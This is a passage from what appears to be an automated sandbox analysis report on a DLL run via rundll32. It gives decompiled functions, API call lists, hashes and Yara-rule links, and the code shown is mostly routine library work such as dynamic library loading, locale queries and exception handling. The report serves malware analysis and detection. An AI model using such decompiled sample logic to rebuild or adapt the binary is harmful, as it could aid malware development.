                                                      Function 6E7FCAD1, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 6E7FCB1C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpin
                                                      • String ID:
                                                      • API String ID: 2593887523-0
                                                      • Opcode ID: 44beac38c0ac0c67e47f97883a64c2be21fccbd9033fb739148d08ca94b4d75f
                                                      • Instruction ID: 740710f7ae420038085746a46902871ef0abcab57c46f95faa89a6e4a9328c0c
                                                      • Opcode Fuzzy Hash: 44beac38c0ac0c67e47f97883a64c2be21fccbd9033fb739148d08ca94b4d75f
                                                      • Instruction Fuzzy Hash: 36F0B435504109FBCF16AFA1CE04DDE7F66EF49360B404569FC085E321CA318E11DAC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773015, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E6E773015() {
				intOrPtr _t8;
				signed int _t16;
				void* _t18;
				void* _t23;

				_push(0);
				E6E784397();
				_t16 =  *0x6e78ccac; // 0x0
				_t8 =  *0x6e78d3b8; // 0x80000003
				if(_t8 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t16 * 4)) + 4))) {
					E6E77886B(_t8, 0x6e78d3b8);
					_pop(_t18);
					if( *0x6e78d3b8 == 0xffffffff) {
						 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd"); // executed
						E6E7722FC(); // executed
						E6E778C46(_t18, 0, E6E78475E);
						E6E778821(0x6e78d3b8);
					}
				}
				E6E784371();
				return 0x6e78d3a8;
			}







                                                      0x6e773015
                                                      0x6e77301c
                                                      0x6e77302c
                                                      0x6e773035
                                                      0x6e773040
                                                      0x6e773048
                                                      0x6e773054
                                                      0x6e773055
                                                      0x6e773057
                                                      0x6e77305f
                                                      0x6e773060
                                                      0x6e773061
                                                      0x6e773062
                                                      0x6e773063
                                                      0x6e77306d
                                                      0x6e773073
                                                      0x6e773079
                                                      0x6e773055
                                                      0x6e77307c
                                                      0x6e773081

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E77301C
                                                        • Part of subcall function 6E77886B: EnterCriticalSection.KERNEL32(6E78C940,6E78D378,6E78D3A4,?,6E771154,6E78D3A4,00000000,6E771679,?), ref: 6E778876
                                                        • Part of subcall function 6E77886B: LeaveCriticalSection.KERNEL32(6E78C940,?,6E771154,6E78D3A4,00000000,6E771679,?), ref: 6E7788B3
                                                        • Part of subcall function 6E7722FC: lstrcpyW.KERNEL32(?,00000031), ref: 6E7723B7
                                                        • Part of subcall function 6E778821: EnterCriticalSection.KERNEL32(6E78C940,6E78D610,?,6E775DA7,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224), ref: 6E77882B
                                                        • Part of subcall function 6E778821: LeaveCriticalSection.KERNEL32(6E78C940,?,6E775DA7,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224,00000000), ref: 6E77885E
                                                        • Part of subcall function 6E778821: RtlWakeAllConditionVariable.NTDLL ref: 6E7788D5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionH_prolog3VariableWakelstrcpy
                                                      • String ID:
                                                      • API String ID: 1607335209-0
                                                      • Opcode ID: 40e80fca6658c6d9a5aaae029f7d3fff3e75c95f703541f2e887b97c60b9c10b
                                                      • Instruction ID: 57b0452c769c7ba7fa40881ff2de3b041c442566c9edc668c121a4b17a1efd77
                                                      • Opcode Fuzzy Hash: 40e80fca6658c6d9a5aaae029f7d3fff3e75c95f703541f2e887b97c60b9c10b
                                                      • Instruction Fuzzy Hash: 34F0B435200A10EBEF549EE8D788B4A735D9B3A329F200C3AD6009BBB0CF355C029A49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77B141, Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77B141(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0x6e78cd58 + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E6E77B0A7(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}









                                                      0x6e77b149
                                                      0x6e77b150
                                                      0x6e77b152
                                                      0x6e77b157
                                                      0x6e77b184
                                                      0x00000000
                                                      0x6e77b184
                                                      0x6e77b15b
                                                      0x6e77b163
                                                      0x6e77b16c
                                                      0x6e77b182
                                                      0x6e77b182
                                                      0x00000000
                                                      0x6e77b182
                                                      0x6e77b172
                                                      0x6e77b17a
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77b17e
                                                      0x00000000
                                                      0x6e77b17e
                                                      0x6e77b189

                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,6E77B1DF,00000001,FlsFree,6E785CF8,FlsFree,00000000,?,6E77A09E,00000004,6E779BF2), ref: 6E77B172
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID:
                                                      • API String ID: 190572456-0
                                                      • Opcode ID: 51efd9640160b6d6455c090ec8b578153d538dc20c0b663952cbeb47c7a35d52
                                                      • Instruction ID: e024cc267a931d075790ffaa75aae3857a9bd55248f8807c64f45cd75a7b8e98
                                                      • Opcode Fuzzy Hash: 51efd9640160b6d6455c090ec8b578153d538dc20c0b663952cbeb47c7a35d52
                                                      • Instruction Fuzzy Hash: 11F0A036204217AFDF224EE9EE1088A37AAFF427707100534FA24D60A4DB30E420CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77111C, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E6E77111C() {
				intOrPtr _t8;
				signed int _t15;
				void* _t17;
				void* _t22;

				_push(0);
				E6E784397();
				_t15 =  *0x6e78ccac; // 0x0
				_t8 =  *0x6e78d3a4; // 0x80000002
				if(_t8 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t15 * 4)) + 4))) {
					E6E77886B(_t8, 0x6e78d3a4);
					_pop(_t17);
					if( *0x6e78d3a4 == 0xffffffff) {
						_t4 = _t22 - 4;
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						E6E779DB0(0x6e78d378, 0x6e78d378, 0, 0x2c);
						E6E77118E( *_t4); // executed
						E6E778C46(_t17,  *_t4, E6E784754);
						E6E778821(0x6e78d3a4);
					}
				}
				E6E784371();
				return 0x6e78d378;
			}







                                                      0x6e77111c
                                                      0x6e771123
                                                      0x6e771133
                                                      0x6e77113c
                                                      0x6e771147
                                                      0x6e77114f
                                                      0x6e77115b
                                                      0x6e77115c
                                                      0x6e77115e
                                                      0x6e77115e
                                                      0x6e771167
                                                      0x6e77116f
                                                      0x6e771179
                                                      0x6e77117f
                                                      0x6e771185
                                                      0x6e77115c
                                                      0x6e771188
                                                      0x6e77118d

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E771123
                                                        • Part of subcall function 6E77886B: EnterCriticalSection.KERNEL32(6E78C940,6E78D378,6E78D3A4,?,6E771154,6E78D3A4,00000000,6E771679,?), ref: 6E778876
                                                        • Part of subcall function 6E77886B: LeaveCriticalSection.KERNEL32(6E78C940,?,6E771154,6E78D3A4,00000000,6E771679,?), ref: 6E7788B3
                                                        • Part of subcall function 6E77118E: __EH_prolog3.LIBCMT ref: 6E771198
                                                        • Part of subcall function 6E778821: EnterCriticalSection.KERNEL32(6E78C940,6E78D610,?,6E775DA7,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224), ref: 6E77882B
                                                        • Part of subcall function 6E778821: LeaveCriticalSection.KERNEL32(6E78C940,?,6E775DA7,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224,00000000), ref: 6E77885E
                                                        • Part of subcall function 6E778821: RtlWakeAllConditionVariable.NTDLL ref: 6E7788D5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterH_prolog3Leave$ConditionVariableWake
                                                      • String ID:
                                                      • API String ID: 1124090874-0
                                                      • Opcode ID: e5f0a8ff35812f3c3e4a691402296abb56caa4f3836b3901e8a549471d236392
                                                      • Instruction ID: 1bff34ee7722aae167b7eb83f63ab1d2a780b0fbd60842a95a1a26f55d1134a2
                                                      • Opcode Fuzzy Hash: e5f0a8ff35812f3c3e4a691402296abb56caa4f3836b3901e8a549471d236392
                                                      • Instruction Fuzzy Hash: BFF0B471601900DFDE21AFD4CB58F8E336DAB33328F240839E5006FAE0DB7458029B5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F99F0, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 6E7F9A22
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: c1f872deadec996cc54e7b9aae8f7061fdf0a5e2b09e6b09353f504f66d37eea
                                                      • Instruction ID: 9cfa986f4fddff470c8bc2a40501ea657df2fdd81ef8a0dd04a4d63463d6a932
                                                      • Opcode Fuzzy Hash: c1f872deadec996cc54e7b9aae8f7061fdf0a5e2b09e6b09353f504f66d37eea
                                                      • Instruction Fuzzy Hash: 46E0E535255216DBFA519EFA8F14BCA365CDF522B4F120531AD14B63B0DB10D843C9E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FC654, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID:
                                                      • API String ID: 2773662609-0
                                                      • Opcode ID: c0fd6b6e13b81e55ba89c8f4a28462c636b9ed5978b99f1310beda255cf0180d
                                                      • Instruction ID: 8d5c70a0cb544f5c1b6baa87b8c8cabcb19d4ea8065de13c2f3dcbe73b0e2c4a
                                                      • Opcode Fuzzy Hash: c0fd6b6e13b81e55ba89c8f4a28462c636b9ed5978b99f1310beda255cf0180d
                                                      • Instruction Fuzzy Hash: 4DE0A771A84519A7C716DBE4DD05AED7B59CB55211B0005AAFC095E310CE309E0185C9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7BCC5F, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7BCC66
                                                        • Part of subcall function 6E79FC60: std::_Lockit::_Lockit.LIBCPMT ref: 6E79FCA7
                                                        • Part of subcall function 6E79FC60: std::_Lockit::_Lockit.LIBCPMT ref: 6E79FCC9
                                                        • Part of subcall function 6E79FC60: std::_Lockit::~_Lockit.LIBCPMT ref: 6E79FCF1
                                                        • Part of subcall function 6E79FC60: std::_Lockit::~_Lockit.LIBCPMT ref: 6E79FE27
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                      • String ID:
                                                      • API String ID: 1383202999-0
                                                      • Opcode ID: 0cdaf8efcd7bc8a067ccd970e68ed0aca1b0c113c72ab6385a804fc8c21ab2fa
                                                      • Instruction ID: 3e028e90564b394850e393a36e15e45d2a73ab924a51b9484c9547e643d4e56f
                                                      • Opcode Fuzzy Hash: 0cdaf8efcd7bc8a067ccd970e68ed0aca1b0c113c72ab6385a804fc8c21ab2fa
                                                      • Instruction Fuzzy Hash: CAE0A035A000099FCF04DFE0C5189FD7779EF45208F204408D4016B2A0DF359A0EEFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D9C13, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 6E7D9C28
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID:
                                                      • API String ID: 2742660187-0
                                                      • Opcode ID: 6b3a93514413710791ab2e193321e458e1b9328d611eb20165a2bb7e8a31c8e8
                                                      • Instruction ID: f87d5f6415f149734bd3a715899d8aae28768183893fb9ef405ae4bbff3d2520
                                                      • Opcode Fuzzy Hash: 6b3a93514413710791ab2e193321e458e1b9328d611eb20165a2bb7e8a31c8e8
                                                      • Instruction Fuzzy Hash: 14D02B72A49B3AB3CB0127E4AD05ADD7A69C7415F3F0004B1FD0C69310E5515510C6C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E776510, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E776510(signed int* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _t3;
				struct HINSTANCE__** _t8;

				_t8 = __ecx;
				 *__ecx =  *__ecx & 0x00000000;
				E6E775D40();
				_t3 = LoadLibraryA(_a4); // executed
				 *_t8 = _t3; // executed
				E6E775EA9(_t3); // executed
				return _t8;
			}





                                                      0x6e776514
                                                      0x6e776516
                                                      0x6e776519
                                                      0x6e776521
                                                      0x6e776529
                                                      0x6e77652b
                                                      0x6e776534

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(000000A4), ref: 6E776521
                                                        • Part of subcall function 6E775EA9: GetProcAddress.KERNEL32(766E0000,00000057,6E78D378,6E78D378,00000000), ref: 6E775FA7
                                                        • Part of subcall function 6E775EA9: GetProcAddress.KERNEL32(766E0000,00000000), ref: 6E77602F
                                                        • Part of subcall function 6E775EA9: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6E776069
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CreateFileLibraryLoad
                                                      • String ID:
                                                      • API String ID: 1287900730-0
                                                      • Opcode ID: 1358d2fcbffa043f099cd8d048138b3bd976400aeaf425764bee6999bf28bab0
                                                      • Instruction ID: 5972fc915b23b5db6f0fb5fdc719c54ec0911dcb0ff38999d3e3c4baf88522fb
                                                      • Opcode Fuzzy Hash: 1358d2fcbffa043f099cd8d048138b3bd976400aeaf425764bee6999bf28bab0
                                                      • Instruction Fuzzy Hash: A8D0C73121021597CF101FE5E809699B6DCDB55366F10043AE544C6250DB7558504794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 6E806CB9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E806FD8,?,00000000), ref: 6E806D52
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E806FD8,?,00000000), ref: 6E806D7B
                                                      • GetACP.KERNEL32(?,?,6E806FD8,?,00000000), ref: 6E806D90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: ba4100f47d4773cef435a50eb226eacbfc5246effc6e608e702fb43fab7ae24e
                                                      • Instruction ID: 20a8989675fa2b5a3750efaebc98c5f8dc677df812c36f7aef1c82e7f694fa56
                                                      • Opcode Fuzzy Hash: ba4100f47d4773cef435a50eb226eacbfc5246effc6e608e702fb43fab7ae24e
                                                      • Instruction Fuzzy Hash: 8221C122624106AAE7668FD9CD05B8773B6EF45B60B428C24FD09DB994E733D981E390
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E806E8D, Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D80
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D8D
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E806F99
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 6E806FF4
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 6E807003
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,6E7F86F8,00000040,?,6E7F8818,00000055,00000000,?,?,00000055,00000000), ref: 6E80704B
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,6E7F8778,00000040), ref: 6E80706A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                      • String ID:
                                                      • API String ID: 745075371-0
                                                      • Opcode ID: d25d4363ebb5c80ebbf7ac0289343e327135f739603e43d0382dd46d66e279ac
                                                      • Instruction ID: d7d2e2764907617cc87bc636ee3cd092cdda85e752d34748cdfe61a53505440b
                                                      • Opcode Fuzzy Hash: d25d4363ebb5c80ebbf7ac0289343e327135f739603e43d0382dd46d66e279ac
                                                      • Instruction Fuzzy Hash: 4651817292060AAFEF40DFE5CC45AEE77B8EF45700F004D69E924EB990D7709980DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E802845, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E81CFB0), ref: 6E8028AF
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,6E85655C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E802927
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,6E8565B0,000000FF,?,0000003F,00000000,?), ref: 6E802954
                                                      • _free.LIBCMT ref: 6E80289D
                                                        • Part of subcall function 6E7F99B6: HeapFree.KERNEL32(00000000,00000000), ref: 6E7F99CC
                                                        • Part of subcall function 6E7F99B6: GetLastError.KERNEL32(6E849074,?,6E805750,6E849074,00000000,6E849074,00000000,?,6E805A55,6E849074,00000007,6E849074,?,6E804DF4,6E849074,6E849074), ref: 6E7F99DE
                                                      • _free.LIBCMT ref: 6E802A69
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: 335ca6e892519212a26cb7852d2cfb4ae68532194c33359c7adf9fa66d610770
                                                      • Instruction ID: 4d1376679f582582954e4498c394ad81f02fdc6d4f0634c4c6dfaeb3b57a99c5
                                                      • Opcode Fuzzy Hash: 335ca6e892519212a26cb7852d2cfb4ae68532194c33359c7adf9fa66d610770
                                                      • Instruction Fuzzy Hash: 8B512A7190020AEFCB50DFEDCC84DEA77BCEF45324B100E6AD56497295EBB89A41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E806537, Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E7F86FF,?,?,?,?,6E7F80DB,?,00000004), ref: 6E806619
                                                      • _wcschr.LIBVCRUNTIME ref: 6E8066A9
                                                      • _wcschr.LIBVCRUNTIME ref: 6E8066B7
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E7F86FF,00000000,6E7F881F), ref: 6E80675A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                      • String ID:
                                                      • API String ID: 4212172061-0
                                                      • Opcode ID: 0497709c685de90a3a5428db1a806d3cbf6bec8fd8e3af69a1f4edf36a7e16eb
                                                      • Instruction ID: 289b7e339c0e33814973218e88b84a51d0d79c9a6da5c0cd2b4579999392f979
                                                      • Opcode Fuzzy Hash: 0497709c685de90a3a5428db1a806d3cbf6bec8fd8e3af69a1f4edf36a7e16eb
                                                      • Instruction Fuzzy Hash: E7610771620607ABE7259FF8CC55BE673ACEF04314F104C29E925DB9C0EB70E98097A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7791BB, Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E6E7791BB(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6E7792D6(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6E779DB0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6E779DB0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6E7792D6(_t49);
				}
				return _t49;
			}


































                                                      0x6e7791bb
                                                      0x6e7791bb
                                                      0x6e7791bb
                                                      0x6e7791cf
                                                      0x6e7791d1
                                                      0x6e7791d4
                                                      0x6e7791d4
                                                      0x6e7791d8
                                                      0x6e7791dd
                                                      0x6e7791f5
                                                      0x6e7791fb
                                                      0x6e779201
                                                      0x6e779207
                                                      0x6e77920d
                                                      0x6e779213
                                                      0x6e779219
                                                      0x6e779220
                                                      0x6e779227
                                                      0x6e77922e
                                                      0x6e779235
                                                      0x6e77923c
                                                      0x6e779243
                                                      0x6e779244
                                                      0x6e77924d
                                                      0x6e779253
                                                      0x6e779256
                                                      0x6e77925c
                                                      0x6e77926b
                                                      0x6e779277
                                                      0x6e779282
                                                      0x6e779289
                                                      0x6e779290
                                                      0x6e77929b
                                                      0x6e7792a3
                                                      0x6e7792ac
                                                      0x6e7792ae
                                                      0x6e7792b1
                                                      0x6e7792b3
                                                      0x6e7792bd
                                                      0x6e7792c5
                                                      0x6e7792cb
                                                      0x00000000
                                                      0x6e7792d2
                                                      0x6e7792d5

